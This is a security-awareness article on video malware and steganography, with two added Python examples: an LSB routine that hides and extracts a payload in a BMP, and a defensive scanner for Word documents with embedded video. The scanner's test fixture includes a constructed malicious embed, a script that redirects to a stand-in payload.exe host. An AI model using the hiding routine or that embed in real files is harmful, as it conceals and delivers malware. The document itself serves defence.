Most employees have some awareness of malware attacks. Many probably know that you should never open an executable file from a stranger or plug in a thumb drive found in the parking lot, for example. But videos, or links to videos, can be the lure or the carrier for malware just as that executable or thumb drive can. Do your employees know this too? And even if they do know it, will they be tricked into chasing malicious videos anyway?

Here’s why it’s time to start focusing on video malware.

Video Is the Perfect Bait for Social Engineering

The lure of video might be the perfect social engineering trick for malware attacks. Recent trends in person-to-person communications and social media have conditioned the public to compulsively open many videos every day. Facebook and Instagram have been retrofitted with viral, addictive video features to keep up with upstarts such as Snapchat and TikTok. YouTube has always emphasized compelling videos, and messaging applications are increasingly carrying video as well.

In other words, video has emerged as the digital “drug” of choice when it comes to escapism, boredom relief and information delivery. As a bonus for cybercriminals, users may believe video files to be harmless, meaning even security-savvy users who would otherwise avoid clicking on suspicious links are likely to open and play videos.

The video habit (or addiction) in our culture has paved the way for video malware: malicious code hidden inside video files. Video malware is part of a larger trend toward stealthier malware delivery. It is also the latest, and probably the most interesting, example of malicious steganography, the practice of embedding something secret inside some other medium. Malware that relies on steganography to smuggle its payload or instructions past defenses inside an innocuous-looking file is sometimes called stegware. One caveat matters for defenders: bytes hidden in a video do nothing on their own. They run only when a loader already on the device extracts them, or when the player or decoder that parses the file has an exploitable bug.

Payloads have been hidden in still-image formats such as JPG, PNG and BMP for years. Now, it appears that video malware is having a moment.
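
As an added illustration (not code from the original article or any real malware family), the Python below hides a payload in the least-significant bits of a constructed 24-bit BMP and extracts it again. The point for defenders is in the last two checks: the carrier stays a valid image and no byte changes by more than one, so nothing about the file looks wrong to a viewer or a format validator, yet the hidden bytes never execute unless a separate extractor on the host pulls them out. The BMP writer, the LCG used to fill the pixels and the length-prefixed framing are this example's own conventions.

```python
import struct

BMP_HEADER_SIZE = 54  # 14-byte file header + 40-byte BITMAPINFOHEADER


def make_bmp(width: int, height: int, seed: int = 7) -> bytes:
    """Constructed carrier: a valid, uncompressed 24-bit BMP filled with LCG noise."""
    stride = (width * 3 + 3) & ~3          # BMP rows are padded to a multiple of 4 bytes
    pixels = bytearray()
    x = seed
    for _ in range(height):
        for _ in range(width * 3):
            x = (x * 1103515245 + 12345) & 0x7FFFFFFF
            pixels.append((x >> 16) & 0xFF)
        pixels.extend(b"\x00" * (stride - width * 3))
    file_header = struct.pack("<2sIHHI", b"BM", BMP_HEADER_SIZE + len(pixels), 0, 0, BMP_HEADER_SIZE)
    dib_header = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0, len(pixels), 2835, 2835, 0, 0)
    return file_header + dib_header + bytes(pixels)


def _pixel_offset(bmp: bytes) -> int:
    """Offset of the pixel array, read from the file header rather than assumed."""
    if bmp[:2] != b"BM":
        raise ValueError("not a BMP file")
    return struct.unpack_from("<I", bmp, 10)[0]


def embed_lsb(carrier: bytes, payload: bytes) -> bytes:
    """Write a 4-byte little-endian length followed by the payload, one bit per pixel byte."""
    pos = _pixel_offset(carrier)
    framed = struct.pack("<I", len(payload)) + payload
    capacity = (len(carrier) - pos) // 8
    if len(framed) > capacity:
        raise ValueError(f"payload needs {len(framed)} bytes, carrier holds {capacity}")
    out = bytearray(carrier)
    for byte in framed:
        for bit in range(8):
            out[pos] = (out[pos] & 0xFE) | ((byte >> bit) & 1)
            pos += 1
    return bytes(out)


def _read_lsb_bytes(stego: bytes, pos: int, count: int):
    """Reassemble `count` bytes from the LSBs starting at `pos`; returns (bytes, next_pos)."""
    chunk = bytearray()
    for _ in range(count):
        value = 0
        for bit in range(8):
            value |= (stego[pos] & 1) << bit
            pos += 1
        chunk.append(value)
    return bytes(chunk), pos


def extract_lsb(stego: bytes) -> bytes:
    """Inverse of embed_lsb; this is the part a loader on the victim host would carry."""
    pos = _pixel_offset(stego)
    length_bytes, pos = _read_lsb_bytes(stego, pos, 4)
    length = struct.unpack("<I", length_bytes)[0]
    if length > (len(stego) - pos) // 8:
        raise ValueError("length field exceeds carrier capacity: not a stego file, or corrupted")
    payload, _ = _read_lsb_bytes(stego, pos, length)
    return payload


def max_byte_delta(a: bytes, b: bytes) -> int:
    """Largest per-byte change between carrier and stego file (1 for pure LSB embedding)."""
    return max(abs(x - y) for x, y in zip(a, b))


if __name__ == "__main__":
    carrier = make_bmp(64, 48)
    secret = b"constructed payload: inert until a loader extracts and runs it"
    stego = embed_lsb(carrier, secret)
    print("header untouched:", stego[:BMP_HEADER_SIZE] == carrier[:BMP_HEADER_SIZE])
    print("max byte delta:", max_byte_delta(carrier, stego))
    print("recovered:", extract_lsb(stego) == secret)
```

The same idea carries over to video containers, where the frame data offers far more capacity; what does not change is that a hidden payload is just data until something on the endpoint reads it back out, which is why the controls later in this article focus on the endpoint and on the documents and players that do the parsing.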

The Latest From the Dangerous Video Front

Because of the irresistible appeal of videos, threat actors have been using the promise of video for many years. One common way to trick people into clicking on a malicious link is to ask, “Are you in this video?” The idea that an embarrassing video of yourself is publicly circulating can compel otherwise educated and rational people to open a video or click on a link, just to be sure. This tactic is common on major messaging platforms, where attackers can make it seem like the video or link was sent by a friend or colleague.

There are more sophisticated versions of this technique. For example, even back in 2014, malware called Trojan.FakeFlash.A placed a photo of a Facebook “friend” on victims’ Facebook feeds with text implying that clicking would launch a highly personal video of that friend, according to USA Today. The malware infected some 2 million systems worldwide.

Neither of these attacks involves an actual video, just the promise of one to entice users into clicking a link or opening a file. Other recent vulnerabilities and attacks have involved actual video files, as part of the ongoing evolution of video as a malware delivery method.

One recent example observed by Trend Micro involved a Word document with an embedded online video. Word stores such a video’s embed code as HTML inside an XML file in the document’s word folder, so an attacker can replace that HTML with code of their own; when the victim opens the document and clicks the video, the attacker’s code runs instead of the video. In July, Symantec disclosed another attack vector, media file jacking, that let attackers alter videos and images in WhatsApp and Telegram on Android before the recipient saw them; fortunately, it did not enable code execution.

Yet another vulnerability, this one in Android, offers a glimpse at what is possible in the distribution of video malware. The flaw in Android versions 7 through 9 (Nougat, Oreo and Pie) sat in the media framework that parses video files: a specially crafted video could trigger remote code execution when the device processed it. The video would have to be sent directly, for example as an email or chat attachment, because services such as YouTube re-encode uploaded videos, which destroys the malformed structure the exploit depends on.

Google has since issued a security update that fixes the flaw, so devices with the update are safe. Devices without the patch (in theory, more than 1 billion of them), however, remain at risk, especially since publishing the fix unavoidably advertised the vulnerability to threat actors. There has been no reported exploitation of the vulnerability, but it suggests previously unexpected possibilities in the realm of video malware.

Following the trends — growing comfort with video, sophisticated techniques for stealth and increasing targeting of mobile devices — we can see the aggressive exploration of the possibilities around smuggling malware in videos. The time to get counter-steganographic is now.

How to Address the Threat of Video Malware Attacks

The scariest threats are the ones nobody has heard of or is expecting. But recent events show that video malware is an intense area of interest for malware authors, first as social engineering and now in the software engineering behind delivery. Here are some steps to prepare your enterprise to expect the unexpected:

  • Architect a unified defensive posture — i.e., break down those cybersecurity silos.
  • Make an advanced unified endpoint management (UEM) solution the core of your defenses.
  • Use threat intelligence to stay on top of recent steganographic attacks and vulnerabilities.
  • Block, or at minimum quarantine and inspect, Word documents containing embedded online videos at the mail and web gateways.
  • As always, stay current on patches and updates for all systems and devices, especially mobile devices.
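
The Word technique described earlier and the recommendation above to block such documents can be turned into a concrete gateway check. The Python below is an added example, not Trend Micro’s code or the article’s: it opens a .docx as the ZIP container it is, reads word/document.xml, pulls out every embeddedHtml attribute (the place Word keeps an online video’s embed code, per the published research; the attribute and namespace names used here are assumptions to verify against a document your own Word version produces) and blocks anything that carries script or points at a host outside an allowlist. The sample documents and their HTML are constructed inside the block.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple
from urllib.parse import urlparse
from xml.sax.saxutils import quoteattr

# Hosts a legitimate "Online Video" insert is expected to point at (assumption; tune for your organisation).
ALLOWED_VIDEO_HOSTS = {"www.youtube.com", "youtube.com"}
SRC_RE = re.compile(r"""src\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


def embedded_video_html(docx_bytes: bytes) -> List[str]:
    """Return every embeddedHtml attribute in word/document.xml, XML-unescaped by the parser."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if "word/document.xml" not in z.namelist():
            return []
        root = ET.fromstring(z.read("word/document.xml"))
    found = []
    for elem in root.iter():
        for name, value in elem.attrib.items():
            if name.rsplit("}", 1)[-1] == "embeddedHtml":   # match with or without a namespace prefix
                found.append(value)
    return found


def classify_html(html: str) -> List[str]:
    """Reasons to block the embed code; an empty list means it looks like a plain video frame."""
    reasons = []
    lowered = html.lower()
    if "<script" in lowered or "javascript:" in lowered or re.search(r"\son\w+\s*=", lowered):
        reasons.append("inline script or event handler in embed HTML")
    for src in SRC_RE.findall(html):
        host = (urlparse(src).hostname or "").lower()
        if host not in ALLOWED_VIDEO_HOSTS:
            reasons.append(f"frame source outside allowed video hosts: {src}")
    return reasons


def scan_docx(docx_bytes: bytes) -> Tuple[str, List[str]]:
    """'clean' = no embedded video, 'allow' = only allowlisted frames, 'block' = anything else."""
    blobs = embedded_video_html(docx_bytes)
    if not blobs:
        return "clean", []
    reasons = [r for html in blobs for r in classify_html(html)]
    return ("block" if reasons else "allow"), reasons


def build_docx(embedded_html: Optional[str]) -> bytes:
    """Constructed minimal .docx carrying only the parts this scanner reads (real files have more)."""
    ns = ('xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
          'xmlns:wp15="http://schemas.microsoft.com/office/word/2012/wordprocessingDrawing"')
    video = ""
    if embedded_html is not None:
        video = f'<wp15:webVideoPr embeddedHtml={quoteattr(embedded_html)} h="360" w="640"/>'
    document = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                f'<w:document {ns}><w:body><w:p>{video}</w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0" encoding="UTF-8"?>'
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", document)
    return buf.getvalue()


# Constructed samples: a normal video frame, and the kind of replacement the research described.
BENIGN_HTML = '<iframe width="640" height="360" src="https://www.youtube.com/embed/VIDEO_ID"></iframe>'
MALICIOUS_HTML = ('<iframe src="https://example.invalid/loader.html"></iframe>'
                  "<script>window.location='https://example.invalid/payload.exe'</script>")

if __name__ == "__main__":
    for label, html in (("no video", None), ("benign", BENIGN_HTML), ("malicious", MALICIOUS_HTML)):
        print(label, scan_docx(build_docx(html)))
```

A blanket block on any document carrying embeddedHtml is the safer default and needs only the first function; the allowlist exists for environments where legitimate video embeds are common enough that blocking them all would be unworkable.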

Your users love videos. And because of the compelling, visceral and viral nature of videos, they’re going to be opening them. Threat actors know this, and they’re always working on new ways to hide malicious code inside videos. Is your enterprise security team ready to fight back?
